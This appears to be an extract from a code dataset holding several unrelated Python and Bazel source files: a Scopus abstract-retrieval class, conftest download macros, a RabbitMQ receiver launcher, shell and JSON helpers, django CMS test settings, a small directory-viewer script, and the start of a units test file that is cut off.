content
stringlengths
0
894k
type
stringclasses
2 values
from collections import namedtuple from pybliometrics.scopus.superclasses import Retrieval from pybliometrics.scopus.utils import chained_get, get_id, detect_id_type,\ get_link, listify class AbstractRetrieval(Retrieval): @property def abstract(self): """The abstract of a document. Note: If this is empty, try property description instead. """ return self._head.get('abstracts') @property def affiliation(self): """A list of namedtuples representing listed affiliations in the form (id, name, city, country). Note: Might be empty. """ out = [] aff = namedtuple('Affiliation', 'id name city country') affs = listify(self._json.get('affiliation', [])) for item in affs: new = aff(id=item.get('@id'), name=item.get('affilname'), city=item.get('affiliation-city'), country=item.get('affiliation-country')) out.append(new) return out or None @property def aggregationType(self): """Aggregation type of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:aggregationType']) @property def authkeywords(self): """List of author-provided keywords of the document.""" keywords = self._json.get('authkeywords') if not keywords: return None else: try: return [d['$'] for d in keywords['author-keyword']] except TypeError: # Singleton keyword return [keywords['author-keyword']['$']] @property def authorgroup(self): """A list of namedtuples representing the article's authors organized by affiliation, in the form (affiliation_id, dptid, organization, city, postalcode, addresspart, country, auid, indexed_name, surname, given_name). If "given_name" is not present, fall back to initials. Note: Affiliation information might be missing or mal-assigned even when it lookes correct in the web view. In this case please request a correction. 
""" out = [] fields = 'affiliation_id dptid organization city postalcode '\ 'addresspart country auid indexed_name surname given_name' auth = namedtuple('Author', fields) items = listify(self._head.get('author-group', [])) index_path = ['preferred-name', 'ce:indexed-name'] for item in items: if not item: continue # Affiliation information aff = item.get('affiliation', {}) try: aff_ids = listify(aff['affiliation-id']) aff_id = ", ".join([a["@afid"] for a in aff_ids]) except KeyError: aff_id = aff.get("@afid") org = _get_org(aff) # Author information (might relate to collaborations) authors = listify(item.get('author', item.get('collaboration', []))) for au in authors: try: given = au.get('ce:given-name', au['ce:initials']) except KeyError: # Collaboration given = au.get('ce:text') new = auth(affiliation_id=aff_id, organization=org, city=aff.get('city'), dptid=aff.get("@dptid"), postalcode=aff.get('postal-code'), addresspart=aff.get('address-part'), country=aff.get('country'), auid=au.get('@auid'), surname=au.get('ce:surname'), given_name=given, indexed_name=chained_get(au, index_path)) out.append(new) return out or None @property def authors(self): """A list of namedtuples representing the article's authors, in the form (auid, indexed_name, surname, given_name, affiliation_id, affiliation, city, country). Note: The affiliation referred to here is what Scopus' algorithm determined as the main affiliation. Property `authorgroup` provides all affiliations. 
""" out = [] fields = 'auid indexed_name surname given_name affiliation' auth = namedtuple('Author', fields) for item in chained_get(self._json, ['authors', 'author'], []): affs = [a for a in listify(item.get('affiliation')) if a] if affs: aff = [aff.get('@id') for aff in affs] else: aff = None new = auth(auid=item['@auid'], surname=item.get('ce:surname'), indexed_name=item.get('ce:indexed-name'), affiliation=aff, given_name=chained_get(item, ['preferred-name', 'ce:given-name'])) out.append(new) return out or None @property def citedby_count(self): """Number of articles citing the document.""" cites = chained_get(self._json, ['coredata', 'citedby-count']) if cites: cites = int(cites) return cites @property def citedby_link(self): """URL to Scopus page listing citing documents.""" return get_link(self._json, 2) @property def chemicals(self): """List of namedtuples representing chemical entities in the form (source, chemical_name, cas_registry_number). In case multiple numbers given, they are joined on ";". """ path = ['enhancement', 'chemicalgroup', 'chemicals'] items = listify(chained_get(self._head, path, [])) fields = 'source chemical_name cas_registry_number' chemical = namedtuple('Chemical', fields) out = [] for item in items: for chem in listify(item['chemical']): number = chem.get('cas-registry-number') try: # Multiple numbers given num = ";".join([n['$'] for n in number]) except TypeError: num = number new = chemical(source=item['@source'], cas_registry_number=num, chemical_name=chem['chemical-name']) out.append(new) return out or None @property def confcode(self): """Code of the conference the document belong to.""" return self._confevent.get('confcode') @property def confdate(self): """Date range of the conference the document belongs to represented by two tuples in the form (YYYY, MM, DD). 
""" dates = self._confevent.get('confdate', {}) try: keys = ("startdate", "enddate") date_order = ("@year", "@month", "@day") d = (tuple(int(dates[k1][k2]) for k2 in date_order) for k1 in keys) return tuple(d) except KeyError: return None @property def conflocation(self): """Location of the conference the document belongs to.""" return chained_get(self._confevent, ['conflocation', 'city-group']) @property def confname(self): """Name of the conference the document belongs to.""" return self._confevent.get('confname') @property def confsponsor(self): """Sponsor(s) of the conference the document belongs to.""" path = ['confsponsors', 'confsponsor'] sponsors = chained_get(self._confevent, path, []) if len(sponsors) == 0: return None if isinstance(sponsors, list): return [s['$'] for s in sponsors] return sponsors @property def contributor_group(self): """List of namedtuples representing contributors compiled by Scopus, in the form (given_name, initials, surname, indexed_name, role). """ path = ['source', 'contributor-group'] items = listify(chained_get(self._head, path, [])) out = [] fields = 'given_name initials surname indexed_name role' pers = namedtuple('Contributor', fields) for item in items: entry = item.get('contributor', {}) new = pers(indexed_name=entry.get('ce:indexed-name'), role=entry.get('@role'), surname=entry.get('ce:surname'), given_name=entry.get('ce:given-name'), initials=entry.get('ce:initials')) out.append(new) return out or None @property def correspondence(self): """namedtuple representing the author to whom correspondence should be addressed, in the form (surname, initials, organization, country, city_group). Multiple organziations are joined on semicolon. 
""" fields = 'surname initials organization country city_group' auth = namedtuple('Correspondence', fields) corr = self._head.get('correspondence') if corr is None: return None aff = corr.get('affiliation', {}) try: org = aff['organization'] try: org = org['$'] except TypeError: # Multiple names given org = "; ".join([d['$'] for d in org]) except KeyError: org = None return auth(surname=corr.get('person', {}).get('ce:surname'), initials=corr.get('person', {}).get('ce:initials'), organization=org, country=aff.get('country'), city_group=aff.get('city-group')) @property def coverDate(self): """The date of the cover the document is in.""" return chained_get(self._json, ['coredata', 'prism:coverDate']) @property def description(self): """Return the description of a record. Note: If this is empty, try property abstract instead. """ return chained_get(self._json, ['coredata', 'dc:description']) @property def doi(self): """DOI of the document.""" return chained_get(self._json, ['coredata', 'prism:doi']) @property def eid(self): """EID of the document.""" return chained_get(self._json, ['coredata', 'eid']) @property def endingPage(self): """Ending page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to head afterwards ending = chained_get(self._json, ['coredata', 'prism:endingPage']) if not ending: path = ['source', 'volisspag', 'pagerange', '@last'] ending = chained_get(self._head, path) return ending @property def funding(self): """List of namedtuples parsed funding information in the form (agency string id acronym country). 
""" path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding'] funds = listify(chained_get(self._json, path, [])) out = [] fund = namedtuple('Funding', 'agency string id acronym country') for item in funds: new = fund(agency=item.get('xocs:funding-agency'), string=item.get('xocs:funding-agency-matched-string'), id=item.get('xocs:funding-agency-id'), acronym=item.get('xocs:funding-agency-acronym'), country=item.get('xocs:funding-agency-country')) out.append(new) return out or None @property def funding_text(self): """The raw text from which Scopus derives funding information.""" path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding-text'] return chained_get(self._json, path) @property def isbn(self): """ISBNs belonging to publicationName as tuple of variying length, (e.g. ISBN-10 or ISBN-13).""" isbns = listify(chained_get(self._head, ['source', 'isbn'], [])) if len(isbns) == 0: return None else: return tuple((i['$'] for i in isbns)) @property def issn(self): """ISSN belonging to the publicationName. Note: If E-ISSN is known to Scopus, this returns both ISSN and E-ISSN in random order separated by blank space. 
""" return chained_get(self._json, ['coredata', 'prism:issn']) @property def identifier(self): """ID of the document (same as EID without "2-s2.0-").""" return get_id(self._json) @property def idxterms(self): """List of index terms (these are just one category of those Scopus provides in the web version) .""" try: terms = listify(self._json.get("idxterms", {}).get('mainterm', [])) except AttributeError: # idxterms is empty return None try: return [d['$'] for d in terms] or None except AttributeError: return None @property def issueIdentifier(self): """Number of the issue the document was published in.""" return chained_get(self._json, ['coredata', 'prism:issueIdentifier']) @property def issuetitle(self): """Title of the issue the document was published in.""" return chained_get(self._head, ['source', 'issuetitle']) @property def language(self): """Language of the article.""" return chained_get(self._json, ['language', '@xml:lang']) @property def openaccess(self): """The openaccess status encoded in single digits.""" return chained_get(self._json, ['coredata', 'openaccess']) @property def openaccessFlag(self): """Whether the document is available via open access or not.""" flag = chained_get(self._json, ['coredata', 'openaccessFlag']) if flag: flag = flag == "true" return flag @property def pageRange(self): """Page range. If this is empty, try .startingPage and .endingPage instead. """ # Try data from coredata first, fall back to head afterwards pages = chained_get(self._json, ['coredata', 'prism:pageRange']) if not pages: return chained_get(self._head, ['source', 'volisspag', 'pages']) return pages @property def pii(self): """The PII (Publisher Item Identifier) of the document.""" return chained_get(self._json, ['coredata', 'pii']) @property def publicationName(self): """Name of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:publicationName']) @property def publisher(self): """Name of the publisher of the document. 
Note: Information provided in the FULL view of the article might be more complete. """ # Return information from FULL view, fall back to other views full = chained_get(self._head, ['source', 'publisher', 'publishername']) if full is None: return chained_get(self._json, ['coredata', 'dc:publisher']) else: return full @property def publisheraddress(self): """Name of the publisher of the document.""" return chained_get(self._head, ['source', 'publisher', 'publisheraddress']) @property def pubmed_id(self): """The PubMed ID of the document.""" return chained_get(self._json, ['coredata', 'pubmed-id']) @property def refcount(self): """Number of references of an article. Note: Requires either the FULL view or REF view. """ try: # REF view return self._ref['@total-references'] except KeyError: # FULL view return self._ref.get('@refcount') @property def references(self): """List of namedtuples representing references listed in the document, in the form (position, id, doi, title, authors, authors_auid, authors_affiliationid, sourcetitle, publicationyear, volume, issue, first, last, citedbycount, type, text, fulltext). `position` is the number at which the reference appears in the document, `id` is the Scopus ID of the referenced document (EID without the "2-s2.0-"), `authors` is a string of the names of the authors in the format "Surname1, Initials1; Surname2, Initials2", `authors_auid` is a string of the author IDs joined on "; ", `authors_affiliationid` is a string of the authors' affiliation IDs joined on "; ", `sourcetitle` is the name of the source (e.g. 
the journal), `publicationyear` is the year of the publication as a string, `volume` and `issue`, are strings referring to the volume and issue, `first` and `last` refer to the page range, `citedbycount` is a string for the total number of citations of the cited item, `type` describes the parsing status of the reference (resolved or not), `text` is Scopus-provided information on the publication, `fulltext` is the text the authors used for the reference. Note: Requires either the FULL view or REF view. Might be empty even if refcount is positive. Specific fields can be empty. Author lists (authors, authors_auid, authors_affiliationid) may contain duplicates but None's have been filtered out. """ out = [] fields = 'position id doi title authors authors_auid '\ 'authors_affiliationid sourcetitle publicationyear volume '\ 'issue first last citedbycount type text fulltext' ref = namedtuple('Reference', fields) items = listify(self._ref.get("reference", [])) for item in items: info = item.get('ref-info', item) volisspag = info.get('volisspag', {}) or {} if isinstance(volisspag, list): volisspag = volisspag[0] volis = volisspag.get("voliss", {}) if isinstance(volis, list): volis = volis[0] # Parse author information try: # FULL view parsing auth = listify(item['ref-info']['ref-authors']['author']) authors = [', '.join([d['ce:surname'], d['ce:initials']]) for d in auth] auids = None affids = None ids = listify(info['refd-itemidlist']['itemid']) doi = _select_by_idtype(ids, id_type='DOI') scopus_id = _select_by_idtype(ids, id_type='SGR') except KeyError: # REF view parsing auth = (info.get('author-list') or {}).get('author', []) authors = [', '.join(filter(None, [d.get('ce:surname'), d.get('ce:given-name')])) for d in auth] auids = "; ".join(filter(None, [d.get('@auid') for d in auth])) affs = filter(None, [d.get('affiliation') for d in auth]) affids = "; ".join([aff.get('@id') for aff in affs]) doi = info.get('ce:doi') scopus_id = info.get('scopus-id') # Combine 
information new = ref(position=item.get('@id'), id=scopus_id, doi=doi, authors="; ".join(authors), authors_auid=auids or None, authors_affiliationid=affids or None, title=info.get('ref-title', {}).get('ref-titletext', info.get('title')), sourcetitle=info.get('ref-sourcetitle', info.get('sourcetitle')), publicationyear=info.get('ref-publicationyear', {}).get('@first'), volume=volis.get('@volume'), issue=volis.get('@issue'), first=volisspag.get('pagerange', {}).get('@first'), last=volisspag.get('pagerange', {}).get('@last'), citedbycount=info.get('citedby-count'), type=info.get('type'), text=info.get('ref-text'), fulltext=item.get('ref-fulltext')) out.append(new) return out or None @property def scopus_link(self): """URL to the document page on Scopus.""" return get_link(self._json, 1) @property def self_link(self): """URL to Scopus API page of this document.""" return get_link(self._json, 0) @property def sequencebank(self): """List of namedtuples representing biological entities defined or mentioned in the text, in the form (name, sequence_number, type). """ path = ['enhancement', 'sequencebanks', 'sequencebank'] items = listify(chained_get(self._head, path, [])) bank = namedtuple('Sequencebank', 'name sequence_number type') out = [] for item in items: numbers = listify(item['sequence-number']) for number in numbers: new = bank(name=item['@name'], sequence_number=number['$'], type=number['@type']) out.append(new) return out or None @property def source_id(self): """Scopus source ID of the document.""" return chained_get(self._json, ['coredata', 'source-id']) @property def sourcetitle_abbreviation(self): """Abbreviation of the source the document is published in. Note: Requires the FULL view of the article. """ return self._head.get('source', {}).get('sourcetitle-abbrev') @property def srctype(self): """Aggregation type of source the document is published in (short version of aggregationType). 
""" return chained_get(self._json, ['coredata', 'srctype']) @property def startingPage(self): """Starting page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to bibrecord afterwards starting = chained_get(self._json, ['coredata', 'prism:startingPage']) if not starting: path = ['source', 'volisspag', 'pagerange', '@first'] starting = chained_get(self._head, path) return starting @property def subject_areas(self): """List of namedtuples containing subject areas of the article in the form (area abbreviation code). Note: Requires the FULL view of the article. """ area = namedtuple('Area', 'area abbreviation code') path = ['subject-areas', 'subject-area'] out = [area(area=item['$'], abbreviation=item['@abbrev'], code=item['@code']) for item in listify(chained_get(self._json, path, []))] return out or None @property def subtype(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Short version of subtypedescription. """ return chained_get(self._json, ['coredata', 'subtype']) or None @property def subtypedescription(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Long version of subtype. """ return chained_get(self._json, ['coredata', 'subtypeDescription']) or None @property def title(self): """Title of the document.""" return chained_get(self._json, ['coredata', 'dc:title']) @property def url(self): """URL to the API view of the document.""" return chained_get(self._json, ['coredata', 'prism:url']) @property def volume(self): """Volume for the document.""" return chained_get(self._json, ['coredata', 'prism:volume']) @property def website(self): """Website of publisher.""" path = ['source', 'website', 'ce:e-address', '$'] return chained_get(self._head, path) def __init__(self, identifier=None, refresh=False, view='META_ABS', id_type=None): """Interaction with the Abstract Retrieval API. 
Parameters ---------- identifier : str or int The identifier of a document. Can be the Scopus EID, the Scopus ID, the PII, the Pubmed-ID or the DOI. refresh : bool or int (optional, default=False) Whether to refresh the cached file if it exists or not. If int is passed, cached file will be refreshed if the number of days since last modification exceeds that value. id_type: str (optional, default=None) The type of used ID. Allowed values: None, 'eid', 'pii', 'scopus_id', 'pubmed_id', 'doi'. If the value is None, the function tries to infer the ID type itself. view : str (optional, default=META_ABS) The view of the file that should be downloaded. Allowed values: META, META_ABS, REF, FULL, where FULL includes all information of META_ABS view and META_ABS includes all information of the META view. For details see https://dev.elsevier.com/guides/AbstractRetrievalViews.htm. Raises ------ ValueError If the id_type parameter or the view parameter contains invalid entries. Examples -------- See https://pybliometrics.readthedocs.io/en/stable/examples/AbstractRetrieval.html. Notes ----- The directory for cached results is `{path}/{view}/{identifier}`, where `path` is specified in `~/.scopus/config.ini`. In case `identifier` is a DOI,, an underscore replaces the forward slash. 
""" # Checks identifier = str(identifier) allowed_views = ('META', 'META_ABS', 'REF', 'FULL') if view not in allowed_views: raise ValueError('view parameter must be one of ' + ', '.join(allowed_views)) if id_type is None: id_type = detect_id_type(identifier) else: allowed_id_types = ('eid', 'pii', 'scopus_id', 'pubmed_id', 'doi') if id_type not in allowed_id_types: raise ValueError('id_type parameter must be one of ' + ', '.join(allowed_id_types)) # Load json Retrieval.__init__(self, identifier=identifier, id_type=id_type, api='AbstractRetrieval', refresh=refresh, view=view) self._json = self._json['abstracts-retrieval-response'] self._head = chained_get(self._json, ["item", "bibrecord", "head"], {}) conf_path = ['source', 'additional-srcinfo', 'conferenceinfo', 'confevent'] self._confevent = chained_get(self._head, conf_path, {}) if self._view == "REF": ref_path = ["references"] else: ref_path = ['item', 'bibrecord', 'tail', 'bibliography'] self._ref = chained_get(self._json, ref_path, {}) def __str__(self): """Return pretty text version of the document. Assumes the document is a journal article and was loaded with view="META_ABS" or view="FULL". """ date = self.get_cache_file_mdate().split()[0] # Authors if self.authors: if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors[0] authors = str(a.given_name) + ' ' + str(a.surname) else: authors = "(No author found)" # All other information s = f'{authors}: "{self.title}", {self.publicationName}, {self.volume}' if self.issueIdentifier: s += f'({self.issueIdentifier})' s += ', ' s += _parse_pages(self) s += f'({self.coverDate[:4]}).' if self.doi: s += f' https://doi.org/{self.doi}.\n' s += f'{self.citedby_count} citation(s) as of {date}' if self.affiliation: s += "\n Affiliation(s):\n " s += '\n '.join([aff.name for aff in self.affiliation]) return s def get_bibtex(self): """Bibliographic entry in BibTeX format. Raises ------ ValueError If the item's aggregationType is not Journal. 
""" if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Item key year = self.coverDate[0:4] first = self.title.split()[0].title() last = self.title.split()[-1].title() key = ''.join([self.authors[0].surname, year, first, last]) # Authors authors = ' and '.join([f"{a.given_name} {a.surname}" for a in self.authors]) # Pages if self.pageRange: pages = self.pageRange elif self.startingPage: pages = f'{self.startingPage}-{self.endingPage}' else: pages = '-' # All information bib = "@article{{{key},\n author = {{{auth}}},\n title = "\ "{{{{{title}}}}},\n journal = {{{jour}}},\n year = "\ "{{{year}}},\n volume = {{{vol}}},\n number = {{{number}}},"\ "\n pages = {{{pages}}}".format( key=key, auth=authors, title=self.title, year=year, jour=self.publicationName, vol=self.volume, number=self.issueIdentifier, pages=pages) # DOI if self.doi: bib += ",\n doi = {{{}}}".format(self.doi) bib += "}" return bib def get_html(self): """Bibliographic entry in html format.""" # Author links au_link = ('<a href="https://www.scopus.com/authid/detail.url' '?origin=AuthorProfile&authorId={0}">{1}</a>') if len(self.authors) > 1: authors = u', '.join([au_link.format(a.auid, a.given_name + ' ' + a.surname) for a in self.authors[0:-1]]) authors += (u' and ' + au_link.format(self.authors[-1].auid, (str(self.authors[-1].given_name) + ' ' + str(self.authors[-1].surname)))) else: a = self.authors[0] authors = au_link.format(a.auid, a.given_name + ' ' + a.surname) title = u'<a href="{}">{}</a>'.format(self.scopus_link, self.title) if self.volume and self.issueIdentifier: volissue = u'<b>{}({})</b>'.format(self.volume, self.issueIdentifier) elif self.volume: volissue = u'<b>{}</b>'.format(self.volume) else: volissue = 'no volume' jlink = '<a href="https://www.scopus.com/source/sourceInfo.url'\ f'?sourceId={self.source_id}">{self.publicationName}</a>' s = f"{authors}, {title}, {jlink}, {volissue}, " +\ f"{_parse_pages(self, unicode=True)}, 
({self.coverDate[:4]})." if self.doi: s += f' <a href="https://doi.org/{self.doi}">doi:{self.doi}</a>.' return s def get_latex(self): """Bibliographic entry in LaTeX format.""" if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors authors = ' '.join([a.given_name, a.surname]) if self.volume and self.issueIdentifier: volissue = f'\\textbf{{{self.volume}({self.issueIdentifier})}}' elif self.volume: volissue = f'\\textbf{{{self.volume}}}' else: volissue = 'no volume' s = f'{authors}, \\textit{{{self.title}}}, {self.publicationName}, ' +\ f'{volissue}, {_parse_pages(self)} ({self.coverDate[:4]}).' if self.doi: s += f' \\href{{https://doi.org/{self.doi}}}{{doi:{self.doi}}}, ' s += f'\\href{{{self.scopus_link}}}{{scopus:{self.eid}}}.' return s def get_ris(self): """Bibliographic entry in RIS (Research Information System Format) format for journal articles. Raises ------ ValueError If the item's aggregationType is not Journal. """ if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Basic information ris = f"TY - JOUR\nTI - {self.title}\nJO - {self.publicationName}"\ f"\nVL - {self.volume}\nDA - {self.coverDate}\n"\ f"PY - {self.coverDate[0:4]}\nSP - {self.pageRange}\n" # Authors for au in self.authors: ris += f'AU - {au.indexed_name}\n' # DOI if self.doi: ris += f'DO - {self.doi}\nUR - https://doi.org/{self.doi}\n' # Issue if self.issueIdentifier: ris += f'IS - {self.issueIdentifier}\n' ris += 'ER - \n\n' return ris def _get_org(aff): """Auxiliary function to extract org information from affiliation for authorgroup. 
""" try: org = aff['organization'] if not isinstance(org, str): try: org = org['$'] except TypeError: # Multiple names given org = ', '.join([d['$'] for d in org if d]) except KeyError: # Author group w/o affiliation org = None return org def _list_authors(lst): """Format a list of authors (Surname, Firstname and Firstname Surname).""" authors = ', '.join([' '.join([a.given_name, a.surname]) for a in lst[0:-1]]) authors += ' and ' + ' '.join([lst[-1].given_name, lst[-1].surname]) return authors def _parse_pages(self, unicode=False): """Auxiliary function to parse and format page range of a document.""" if self.pageRange: pages = f'pp. {self.pageRange}' elif self.startingPage: pages = f'pp. {self.startingPage}-{self.endingPage}' else: pages = '(no pages found)' if unicode: pages = u'{}'.format(pages) return pages def _select_by_idtype(lst, id_type): """Auxiliary function to return items matching a special idtype.""" try: return [d['$'] for d in lst if d['@idtype'] == id_type][0] except IndexError: return None
python
"""Repository macros for conftest"""

load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load(":platforms.bzl", "OS_ARCH")

# Pinned conftest release fetched by conftest_rules_dependencies().
CONFTEST_VERSION = "0.23.0"

# Minimal BUILD file injected into each downloaded archive so the extracted
# `conftest` binary is visible to other packages.
_BUILD_FILE_CONTENT = """
exports_files(["conftest"])
"""

# sha256 checksum of every release archive we may download, keyed by the
# archive file name. Keys must match archive_name as computed below.
SHA256S = {
    "conftest_0.23.0_Darwin_x86_64.tar.gz": "863d2eb3f9074c064e5fc0f81946fb7a04325dd72168468c83a99d139337bafc",
    "conftest_0.23.0_Linux_x86_64.tar.gz": "60b9c2f2338514b9ec3185051ff29b3aa83c753901810b3a396789c33fd520de",
    "conftest_0.23.0_Linux_arm64.tar.gz": "852668ffc20bcecbb7ab4862e911b4f35e37d6df1ead89ee1d35901ce03c9e08",
    "conftest_0.23.0_Windows_x86_64.zip": "d7aef1c7a91800a7212eb87d6d3b83a0b931a7b1dc03a346f220a1fd04f4056d",
}

def conftest_rules_dependencies():
    """Declare one conftest http_archive repository per (os, arch) in OS_ARCH.

    Each repository is named `conftest_{os}_{arch}` and exposes the
    `conftest` binary through the injected BUILD file content.
    """
    for os, arch in OS_ARCH:
        # Windows releases ship as .zip; every other platform uses .tar.gz.
        archive_format = "zip" if os == "windows" else "tar.gz"
        archive_name = "conftest_{v}_{os}_{arch}.{format}".format(
            v = CONFTEST_VERSION,
            os = os.capitalize(),  # release file names capitalize the OS name
            arch = arch,
            format = archive_format,
        )
        http_archive(
            name = "conftest_{os}_{arch}".format(os = os, arch = arch),
            sha256 = SHA256S[archive_name],
            urls = [
                "https://github.com/open-policy-agent/conftest/releases/download/v{}/{}".format(CONFTEST_VERSION, archive_name),
            ],
            build_file_content = _BUILD_FILE_CONTENT,
        )
python
from skipper_lib.events.event_receiver import EventReceiver
from app.data_service import DataService
import os


def main():
    """Start the data-service queue consumer.

    All connection parameters come from environment variables with local
    defaults; constructing the EventReceiver wires DataService to the
    'skipper_data' queue.
    """
    env = os.getenv
    receiver = EventReceiver(
        username=env('RABBITMQ_USER', 'skipper'),
        password=env('RABBITMQ_PASSWORD', 'welcome1'),
        host=env('RABBITMQ_HOST', '127.0.0.1'),
        port=env('RABBITMQ_PORT', 5672),
        queue_name=env('QUEUE_NAME', 'skipper_data'),
        service=DataService,
        service_name=env('SERVICE_NAME', 'data'),
        logger=env('LOGGER_RECEIVER_URL',
                   'http://127.0.0.1:5001/api/v1/skipper/logger/log_receiver'),
    )


if __name__ == "__main__":
    main()
python
# helpers.py
import datetime
# import whois
import json
import socket
import time
import traceback
from random import choice
from threading import Thread
from urllib.parse import quote as urlencode
from urllib.parse import unquote

import pytz
import requests
import socks
import subprocess
from urllib.error import URLError
from pytrends.request import TrendReq

LOG_TRACE = True

# Source: https://www.statista.com/statistics/274490/global-value-of-share-holdings-since-2000/
TOTAL_WORLD_CAP_TRILLIONS_USD = 116.78


def get_pretty_json_string(value):
    """Serialize *value* to an indented, key-sorted JSON string.

    Non-ASCII characters are kept as-is (ensure_ascii=False).
    """
    return json.dumps(value, indent=4, sort_keys=True, ensure_ascii=False)


def shell(
    shell_command_line: str,
    print_stdout_stderr_bool: bool = True,
    capture_streams_bool: bool = True,
    as_text: bool = True,
    shell_executable_str: str = "bash",
    command_line_flag_str: str = "-c"
):
    """Run *shell_command_line* via `shell_executable_str -c ...`.

    Returns the subprocess.CompletedProcess with captured stdout/stderr
    (as bytes). When print_stdout_stderr_bool is true, both streams are
    decoded as UTF-8 and printed on a best-effort basis.

    NOTE(review): capture_streams_bool and as_text are currently unused;
    they are reserved for the commented-out py3.7+ capture_output/text
    call below — confirm before wiring them up.
    """
    result = subprocess.run(
        [shell_executable_str, command_line_flag_str, shell_command_line],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
        # capture_output=capture_streams_bool, text=as_text  # py3.7+
    )
    if print_stdout_stderr_bool:
        # Best effort: a decode/print failure must not mask the result.
        # `except Exception` (rather than a bare except) lets
        # KeyboardInterrupt/SystemExit propagate naturally, preserving the
        # original explicit `except KeyboardInterrupt: raise` behavior.
        try:
            print(result.stdout.decode('utf-8'))
        except Exception:
            traceback.print_exc()
        try:
            print(result.stderr.decode('utf-8'))
        except Exception:
            traceback.print_exc()
    return result
python
# Django settings overrides consumed by djangocms-helper when running the
# djangocms_versioning test suite (see run() below).
HELPER_SETTINGS = {
    "TIME_ZONE": "America/Chicago",
    "INSTALLED_APPS": [
        "djangocms_text_ckeditor",
        "djangocms_versioning",
        "djangocms_versioning.test_utils.extensions",
        "djangocms_versioning.test_utils.polls",
        "djangocms_versioning.test_utils.blogpost",
        "djangocms_versioning.test_utils.text",
        "djangocms_versioning.test_utils.people",
        "djangocms_versioning.test_utils.unversioned_editable_app",
    ],
    # Disable migrations for these apps so test databases are built
    # directly from the current models.
    "MIGRATION_MODULES": {
        "auth": None,
        "cms": None,
        "menus": None,
        "djangocms_versioning": None,
    },
    "CMS_PERMISSION": True,
    "LANGUAGES": (
        ("en", "English"),
        ("de", "German"),
        ("fr", "French"),
        ("it", "Italiano"),
    ),
    # Per-site CMS language config; fallback chains are deliberately
    # asymmetric so fallback resolution can be exercised by the tests.
    "CMS_LANGUAGES": {
        1: [
            {"code": "en", "name": "English", "fallbacks": ["de", "fr"]},
            {
                "code": "de",
                "name": "Deutsche",
                "fallbacks": ["en"],  # FOR TESTING DO NOT ADD 'fr' HERE
            },
            {
                "code": "fr",
                "name": "Française",
                "fallbacks": ["en"],  # FOR TESTING DO NOT ADD 'de' HERE
            },
            {
                "code": "it",
                "name": "Italiano",
                "fallbacks": ["fr"],  # FOR TESTING, LEAVE AS ONLY 'fr'
            },
        ]
    },
    "PARLER_ENABLE_CACHING": False,
    "LANGUAGE_CODE": "en",
}


def run():
    # Delegate to djangocms-helper, which picks up HELPER_SETTINGS from
    # this module and runs the djangocms_versioning tests.
    from djangocms_helper import runner

    runner.cms("djangocms_versioning", extra_args=[])


if __name__ == "__main__":
    run()
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ script to open directory in current window manager """ import utool as ut if __name__ == '__main__': import sys if len(sys.argv) == 2: path = sys.argv[1] else: path = None ut.assertpath(path) if ut.checkpath(path, verbose=True): ut.view_directory(path) # F:\\data\\work\\PZ_MTEST\\_ibsdb\\
python
# -*- coding: utf-8 -*- '''Chemical Engineering Design Library (ChEDL). Utilities for process modeling. Copyright (C) 2017 Caleb Bell <[email protected]> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' from __future__ import division import types from fluids.numerics import assert_close, assert_close1d, assert_close2d import pytest import fluids from fluids.units import * from fluids.units import kwargs_to_args def test_kwargs_to_args(): sig = ['rho', 'mu', 'nu'] args = (1,) kwargs = {'mu': 2.2} assert [1, 2.2, None] == kwargs_to_args(args, kwargs, sig) kwargs = {'nu': 2.2} assert [1, None, 2.2] == kwargs_to_args(args, kwargs, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args(tuple(), {'mu': 2.2, 'nu': 5.5, 'rho': 12.2}, sig) assert [None, None, None] == kwargs_to_args(tuple(), {}, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args((12.2, 2.2, 5.5), {}, sig) def assert_pint_allclose(value, magnitude, units, rtol=1e-7, atol=0): assert_close(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if 
